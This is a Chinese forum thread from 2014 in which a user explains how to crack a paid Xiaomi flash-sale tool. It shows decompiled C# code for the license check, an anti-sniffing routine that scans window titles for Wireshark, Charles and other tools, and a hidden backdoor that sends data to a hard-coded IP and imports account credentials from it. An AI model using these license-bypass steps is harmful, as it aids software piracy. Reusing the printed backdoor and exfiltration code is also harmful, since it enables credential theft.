来个破解【小米火警】的教程

＾陪妳ソ看日落 · 发表于 2014-4-21 16:21:37

[C#] 纯文本查看 复制代码

string str = Class0.smethod_0(Class1.smethod_0("awBoAHQAQwBoAHUAZQBBAgGAlBAVAMGA") + ":" + this.miSekillPanelVM_0.method_6(this).XiaomiId);
        this.miSekillPanelVM_0.method_5(str);
        if (str.StartsWith(Class1.smethod_0("ARw==AE4")))
        {
            this.Enum0_0 = Enum0.const_5;
            this.Boolean_1 = false;
            this.miSekillPanelVM_0.method_6(this).Message = Class1.smethod_0("C4ALpUuAC5R+1PzDXuuftA+d");
        }
        else if (str.StartsWith(Class1.smethod_0("ASw==AE8")))
        {
            this.Enum0_0 = Enum0.const_8;
            this.Boolean_1 = true;
        }
        else
        {
            this.Enum0_0 = Enum0.const_23;
            this.miSekillPanelVM_0.method_6(this).Message = Class1.smethod_0("++VGWdD/wFgb2OI+U49XXiTZ");
        }

＾陪妳ソ看日落 · 发表于 2014-4-21 16:23:01

关键代码在这了，这就是验证授权的地方了。。那么到底哪个才是正确授权的逻辑呢
在上面的执行流程可以看到，Enum0.const_4 接下里的状态是 6 跟 8
很明显了，中间那个判断就是授权成功的逻辑了。。。找到了。。那么就修改IL改变方法逻辑就行啦
具体怎样改我就不多说了，大家自己动手，相信能够改出来的

------------------------------------------------------------------------------我是分割线---------------------------------------------------------------------------------------------

＾陪妳ソ看日落 · 发表于 2014-4-21 16:24:45

授权搞定了，那么接下来就是臭名昭著的后门
不用考虑，后门肯定要取自己的服务器数据。。最直接的，，抓包，我用的是 HTTP Analyzer
额。这个时候问题来了，我发现。我开着 HTTP Analyzer的时候。软件就到了登陆中就死都不动了，
我关掉它，又能跑下去了。。纠结啊
折腾好久才找到，居然在软件里面判断了现有进程的标题，对于特定的标题，软件就罢工真可恶
在 Class118 的 method_7()

＾陪妳ソ看日落 · 发表于 2014-4-21 16:25:10

[C#] 纯文本查看 复制代码

foreach (Process process in enumerable)
                        {
                            string str = process.MainWindowTitle.ToLower();
                            if (!(((!str.Contains("http") && !str.Contains("sniffer")) && ((!str.Contains("wireshark") && !str.Contains("sock")) && !str.Contains("charles"))) || process.MainWindowTitle.ToLower().Contains("http://")))
                            {
                                Thread.Sleep(0x3e8);
                                this.method_7();
                            }
                        }

＾陪妳ソ看日落 · 发表于 2014-4-21 16:26:16

戳爆它，继续抓包

抓到的包看到。。登陆完成之后还发了一个请求，指向 http://115.28.34.62:1986/CheckAuth.aspx
狐狸尾巴出来了，接下来就是搜索字符串，找到 Class0 的 smethod_0(string)

[C#] 纯文本查看 复制代码

string str = "http://115.28.34.62:1986/CheckAuth.aspx";
        if (bool_0)
        {
            str = "http://wyh.hd.xiaomi.com:1986/CheckAuth.aspx";
        }
        string str2 = Class1.smethod_3(string_1);
        Class118 class2 = new Class118 {
            bool_1 = true
        };
        return Class1.smethod_4(class2.method_0(str, "data=" + HttpUtility.UrlEncode(str2)));

＾陪妳ソ看日落 · 发表于 2014-4-21 16:27:13

查找引用

＾陪妳ソ看日落 · 发表于 2014-4-21 16:29:41

[C#] 纯文本查看 复制代码

string[] strArray = Class0.smethod_0(Class1.smethod_0("UAcgBtAEkAbwBwAHQAcgAAcgBGAG0AbwBlAFM=gc2BGA") + ":" + int_0).Split(new char[] { '\n' });
        int num = 0;
        foreach (string str in strArray)
        {
            if (!string.IsNullOrEmpty(str))
            {
                string[] strArray2 = str.Split(new char[] { '\r' });
                UserSekillVM item = new UserSekillVM {
                    Account = strArray2[0].Trim(),
                    Password = strArray2[1].Trim(),
                    Status = "Imported"
                };
                list.Add(item);
                num++;
            }

＾陪妳ソ看日落 · 发表于 2014-4-21 16:35:19

看来没错了。。这段代码存在明显的给用户名，密码赋值。。
当然还有其他判断依据。。 UAcgBtAEkAbwBwAHQAcgAAcgBGAG0AbwBlAFM=gc2BGA 这个字符串解密出来的意思就是 ImportFromServer 怎么解出来的就不说了。
反正是找到了。。
好，接下来再找到哪个地方调用到这个该死的方法

怎么找就不用说了吧。。找到这。。这后门就出来啦。。
改IL，砸了它，自己动手丰衣足食哈。就不多说了。我是把他这个if逻辑里面的指令清空

------------------------------------------------------------------------------我是分割线--------------------------------------------------------------------------------------------------------------------
这上面也只是火警两个最主要的核心破解啦，当然，还有其他的，去更新，去账号限制，改标题之类的就不说了，这些不难找
这里面用到的东西大多都是 Blue大新手教程里面的。嘿，小白第一次破解。哪里不对的欢迎指出。。

＾陪妳ソ看日落 · 发表于 2014-4-21 16:39:16

谢谢观赏！

bor———— · 发表于 2014-4-21 22:25:32

受教了，学习中……

		自动登录	找回密码
密码			马上注册

[破解] 来个破解【小米火警】的教程